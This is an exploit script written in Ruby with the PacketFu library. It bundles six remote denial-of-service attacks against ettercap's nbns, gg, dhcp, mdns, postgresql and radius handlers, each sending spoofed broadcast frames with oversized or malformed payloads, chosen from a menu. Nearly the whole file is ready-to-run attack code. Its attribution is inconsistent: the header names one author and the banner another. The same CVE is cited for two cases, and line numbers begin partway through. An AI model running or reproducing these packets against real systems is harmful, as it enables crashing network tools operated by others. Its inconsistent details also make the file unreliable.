  #Exploit Title: 6 Remote ettercap Dos exploits to 1
  #Date: 19/12/2014
  #Exploit Author: Marko Armitage
  #Vendor Homepage: http://ettercap.github.io
  #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
  #Version: 0.8.0-0.8.1
  #Tested on: Linux
  #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
  #     (five identifiers for six cases; the menu below cites CVE-2014-9376 for
  #      both the gg and dhcp dissectors - verify the gg identifier separately)
  #Make sure that you have installed packetfu and pcaprub
  #Every case writes a spoofed frame straight to the interface (PacketFu to_w),
  #which needs raw-socket privileges (root / CAP_NET_RAW) and must only be done
  #on a network you are authorized to test. The target is the ettercap sniffer
  #itself, not the host named by dst_ip.
  10.  
  require 'ipaddr'
  require 'packetfu'
  include PacketFu
  13.  
  14. if ARGV.count < 4
  15. puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
  16. puts "[-]Use valid mac for your interface, if you dont know"+
  17. " victim's ip address use broadcast"
  18. exit
  19. end
  20.  
  21. def nbns_header
  22. u = UDPPacket.new()
  23. u.eth_saddr = ARGV[2]
  24. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  25. u.ip_daddr = ARGV[1]
  26. u.ip_saddr = ARGV[0]
  27. u.udp_src = 4444
  28. u.udp_dst = 137
  29. u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
  30. u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
  31. u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
  32. u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
  33. u.payload << "\x00\x20" #type
  34. u.payload << "\x00\x01" #class
  35. u.payload << "A"*1000 #pad
  36. u.recalc
  37. u.to_w(ARGV[3])
  38. end
  39. def gg_client
  40. u = TCPPacket.new()
  41. u.eth_saddr = ARGV[2]
  42. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  43. u.ip_saddr = ARGV[0]
  44. u.ip_daddr = ARGV[1]
  45. u.tcp_src = 3333
  46. u.tcp_dst = 8074
  47. u.payload = "\x15\x00\x00\x00" #gg_type
  48. u.payload << "\xe8\x03\x00\x00" #gg_len
  49. u.payload << "A"*1000
  50. u.recalc
  51. u.to_w(ARGV[3])
  52. end
  53. def dhcp_header
  54. u = UDPPacket.new()
  55. u.eth_saddr = ARGV[2]
  56. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  57. u.ip_daddr = ARGV[0]
  58. u.ip_saddr = ARGV[1]
  59. u.udp_src = 67
  60. u.udp_dst = 4444
  61. u.payload = "\x02"*236
  62. u.payload << "\x63\x82\x53\x63"
  63. u.payload << "\x35"
  64. u.payload << "\x00\x05\x00"
  65. u.payload << "\x51"
  66. u.payload << "\x00" #size
  67. u.payload << "A" * 3 #pad
  68. u.recalc
  69. u.to_w(ARGV[3])
  70. end
  71.  
  72. def mdns_header
  73. u = UDPPacket.new()
  74. u.eth_saddr = ARGV[2]
  75. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  76. u.ip_daddr = ARGV[1]
  77. u.ip_saddr = ARGV[0]
  78. u.udp_src = 4444
  79. u.udp_dst = 5353
  80. u.payload = "\x11\x11" #id
  81. u.payload << "\x00\x00" #flags
  82. u.payload << "\x00\x01" #questions
  83. u.payload << "\x00\x00" #answer_rr
  84. u.payload << "\x00\x00" #auth_rrs
  85. u.payload << "\x00\x00" #additional_rr
  86. u.payload << "\x06router\x05local\x00" #name
  87. u.payload << "\x00\x01" #type
  88. u.payload << "\x00\x01" #class
  89. u.recalc
  90. u.to_w(ARGV[3])
  91. end
  92. def mdns_dos_header
  93. u = UDPPacket.new()
  94. u.eth_saddr = ARGV[2]
  95. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  96. u.ip_daddr = ARGV[1]
  97. u.ip_saddr = ARGV[0]
  98. u.udp_src = 4444
  99. u.udp_dst = 5353
  100. u.payload = "\x11\x11" #id
  101. u.payload << "\x00\x00" #flags
  102. u.payload << "\x00\x01" #questions
  103. u.payload << "\x00\x00" #answer_rr
  104. u.payload << "\x00\x00" #auth_rrs
  105. u.payload << "\x00\x00" #additional_rr
  106. u.payload << "\x01"
  107. u.payload << "\x00\x01" #type
  108. u.payload << "\x00\x01" #class
  109. u.payload << "A"*500
  110. u.recalc
  111. u.to_w(ARGV[3])
  112. end
  113.  
  114. def pgsql_server
  115. u = TCPPacket.new()
  116. u.eth_saddr = ARGV[2]
  117. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  118. u.ip_saddr = ARGV[1]
  119. u.ip_daddr = ARGV[0]
  120. u.tcp_src = 5432
  121. u.tcp_dst = 3333
  122. u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  123. u.recalc
  124. u.to_w(ARGV[3])
  125. end
  126. def pgsql_client
  127. u = TCPPacket.new()
  128. u.eth_saddr = ARGV[2]
  129. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  130. u.ip_saddr = ARGV[0]
  131. u.ip_daddr = ARGV[1]
  132. u.tcp_src = 3333
  133. u.tcp_dst = 5432
  134. u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  135. u.recalc
  136. u.to_w(ARGV[3])
  137. end
  138.  
  139. def pgsql_client_shell
  140. u = TCPPacket.new()
  141. u.eth_saddr = ARGV[2]
  142. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  143. u.ip_saddr = ARGV[0]
  144. u.ip_daddr = ARGV[1]
  145. u.tcp_src = 3333
  146. u.tcp_dst = 5432
  147. u.payload = "\x70"
  148. u.payload << "\x00\x00\x03\xe9" #len
  149. u.payload << "A"*1000
  150. u.payload << "\x00"
  151. u.recalc
  152. u.to_w(ARGV[3])
  153. end
  154.  
  155. def radius_header
  156. u = UDPPacket.new()
  157. u.eth_saddr = ARGV[2]
  158. u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  159. u.ip_daddr = ARGV[1]
  160. u.ip_saddr = ARGV[0]
  161. u.udp_src = 4444
  162. u.udp_dst = 1645
  163. u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
  164. u.recalc
  165. u.to_w(ARGV[3])
  166. end
  167.  
  168. puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
  169. puts "[+]-1- nbns plugin CVE-2014-9377"
  170. puts "[+]-2- gg dissector CVE-2014-9376"
  171. puts "[+]-3- dhcp dissector CVE-2014-9376"
  172. puts "[+]-4- mdns plugin CVE-2014-9378"
  173. puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
  174. puts "[+]-6- radius dissector CVE-2014-9379"
  175. print "choice:"
  176. choice = $stdin.gets.chomp().to_i()
  177.  
  178. case choice
  179. when 1
  180. puts "[+]Sending nbns packet.."
  181. nbns_header
  182. when 2
  183. puts "[+]Sending client gg packet.."
  184. gg_client
  185. when 3
  186. puts "[+]Sending dhcp packet.."
  187. dhcp_header
  188. when 4
  189. puts "[+]Sending mdns packet.."
  190. mdns_header
  191. mdns_dos_header
  192. when 5
  193. puts "[+]Sending pgsql packet.."
  194. pgsql_client
  195. pgsql_server
  196. pgsql_client_shell
  197. when 6
  198. puts "[+]Sending radius packet.."
  199. radius_header
  200. else
  201. puts "[-]Unrecognized command "
  202. end